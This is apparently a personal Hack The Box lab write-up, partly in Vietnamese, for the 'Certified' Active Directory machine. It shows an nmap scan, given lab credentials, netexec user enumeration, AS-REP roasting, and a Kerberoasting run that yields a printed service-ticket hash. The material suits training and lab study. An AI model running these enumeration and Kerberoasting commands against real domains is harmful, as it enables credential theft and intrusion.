Certified

First nmap

# Nmap 7.95 scan initiated Wed Dec 17 22:51:50 2025 as: /usr/lib/nmap/nmap --privileged -sC -sV -v -oN ./nmap/nmap.txt 10.129.231.186
Nmap scan report for 10.129.231.186
Host is up (0.24s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-12-17 22:52:27Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:05:29
| Not valid after:  2105-05-23T21:05:29
| MD5:   ac8a:4187:4d19:237f:7cfa:de61:b5b2:941f
|_SHA-1: 85f1:ada4:c000:4cd3:13de:d1c2:f3c6:58f7:7134:d397
|_ssl-date: 2025-12-17T22:53:52+00:00; +7h00m01s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-12-17T22:53:51+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:05:29
| Not valid after:  2105-05-23T21:05:29
| MD5:   ac8a:4187:4d19:237f:7cfa:de61:b5b2:941f
|_SHA-1: 85f1:ada4:c000:4cd3:13de:d1c2:f3c6:58f7:7134:d397
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:05:29
| Not valid after:  2105-05-23T21:05:29
| MD5:   ac8a:4187:4d19:237f:7cfa:de61:b5b2:941f
|_SHA-1: 85f1:ada4:c000:4cd3:13de:d1c2:f3c6:58f7:7134:d397
|_ssl-date: 2025-12-17T22:53:53+00:00; +7h00m01s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-12-17T22:53:51+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-11T21:05:29
| Not valid after:  2105-05-23T21:05:29
| MD5:   ac8a:4187:4d19:237f:7cfa:de61:b5b2:941f
|_SHA-1: 85f1:ada4:c000:4cd3:13de:d1c2:f3c6:58f7:7134:d397
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-12-17T22:53:14
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 17 22:53:53 2025 -- 1 IP address (1 host up) scanned in 122.19 seconds

Sau đó As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: judith.mader Password: judith09 Dựa trên này ta tiến hành enumeration

netexec smb $target -u 'judith.mader' -p 'judith09' --users | awk '{print $5}' | fgrep -v '[*]' | tee users.txt

impacket-GetNPUsers certified.htb/ -dc-ip $target -usersfile users.txt -outputfile hashes.txt -> không có gì

impacket-GetUserSPNs certified.htb/ -dc-ip $target -usersfile users.txt -outputfile hashes.txt -> có gì Bị lỗi sai timezone

Host script results:
| smb2-time: 
|   date: 2025-12-17T23:27:01
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s

-> sudo date -s "+7 hours 29 minutes 20 seconds"

Nếu không có - là + Sau khi chỉnh giò lại, thu được hash

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName               Name            MemberOf                                    PasswordLastSet             LastLogon  Delegation 
---------------------------------  --------------  ------------------------------------------  --------------------------  ---------  ----------
certified.htb/management_svc.DC01  management_svc  CN=Management,CN=Users,DC=certified,DC=htb  2024-05-13 22:30:51.476756  <never>               



[-] CCache file is not found. Skipping...
$krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$cbfe9a7d7331beb78ead85c5b300f4ff$c6ff5b7cbc0377e75597dd48b1afef06a90a79c98c650886cf7d02411f7870f0281c6ca28baea7e13a1d02078d3e0319292e21ee00d9c96e21f3cfcd10aa5aea3b64b254dc6055b6f4d549530603a87139a76ad05adfe6233581b8517bd7966e4a36e5e78038b7bb04f814560a4174e9f814f44a2129cd057a3849dfd9f3d857dfa82668d2c99d83c0ed34417919316fd0c576dea50d0fe41221b71b4ef55cdd9bfe58b8b689829caf9d4dbd8272b45906bc057b92fb994a1bd1ac99c5ac066774be9e8bc5e9d9b81bb43a2385d1b9cbc758b07db593b2271a37f69374f95f622e84319009280944b13948b9a9e394fd759c12dd8f6c28c8c80e00abf5016d1be6d74223661a8ea91d78650da53a8553fa0463d189450808c1c8d7f6d2537ba8d586865b2357dd0b30dc92182cd7cb0d193463af5d77e42bc83ab28eb167dae35ae4eac183d9cb9981093332b5fcdd53703edaefb458ff6c706ce5f42dfb23f3e7de8ef3634248fa1cfb86a20dafeaca790bd3d4866c3ca5c5e73c098fc3a537a150285a2c4d0bb3ccaf835425afbc0479454547d0d7d63ab929e60491325bc8d92ed9ab493d4c4dfc8e5af51ee0e429f9a451c92fbe69240c5c30297c6228dc4072d74cba9038e665e5125580a9521ab6d1e0be863314471bb93934ef44fc95de557fd17438a800e2c74155d19b029076af419f373882e372c890757e8c434268bc315b70c0f248a0f1bfac80036f30352eadfa2d45b5d7fe359a96ffc9cfc6fe602856bf1da728de53e3113d777effb58eb39bca08ccf54f2477d926b61bc63dd0d0f2b0c746574a6adf5e695656ded11258a62b4921c71fd9f25f47d5b439ac6d8aa8a672aa14439dc22dc1ea621e5b6c8e406920d10c460469a07be3fc53e506d05f772913a61119ead8d465c9be51430848eed8b73ca249ea5a0dafca512209058cff251c812d29a434505759b428dfb28ba6a8d6e86d93dd0bd395f858383bede78562a20090b21a7fbc2d1aba7929c20d46645b0af2d8a0e0961961097bebd1d3c2eef40d4271b968f59aab6e63172ca9f7079f33503cee408a68efc3c2f61a33620023e9a744f5978e3f2400632af7a840655da0d17fbd77011bef24baa2f8d7a3159bd6beac7121dd8cdf6d73bd1d2b87f238c32bcac07dd4b9af279ec7f431f01578bd17404f6b3403bd5b9a6c62a78a442ce58babb4d92441058d9f717b3d6b06344548badb502f66af7640cd59665d529ea2eaf78988dd7b297dda7c2f0724201b527934a8aa6e47a5e217bcfab4101dc05e4e171610ae3385f5ca977fb925f148bbbe280ad8d183aa5631182303a9e3b47653b26be530c62b8eeecdedd2e6e42afb89fe4c8e9fc758f1c73926f8dc2fedd8a4086ec5035ad0bfa79aaa16962d90af33e18313c7552b86246562cc47d8fe91dc5d85835afa0a70092ee7c449693d884e28e071aa45fcd05ba5545967390111f923ded7a5f1502587a21e91afa535666cde5e102dfda6838776fdf7259163880af6a5bd2edac5ba23cd17753733b54c1e052775a55d6578e131541b0d8d8c7be748

First nmap​

First nmap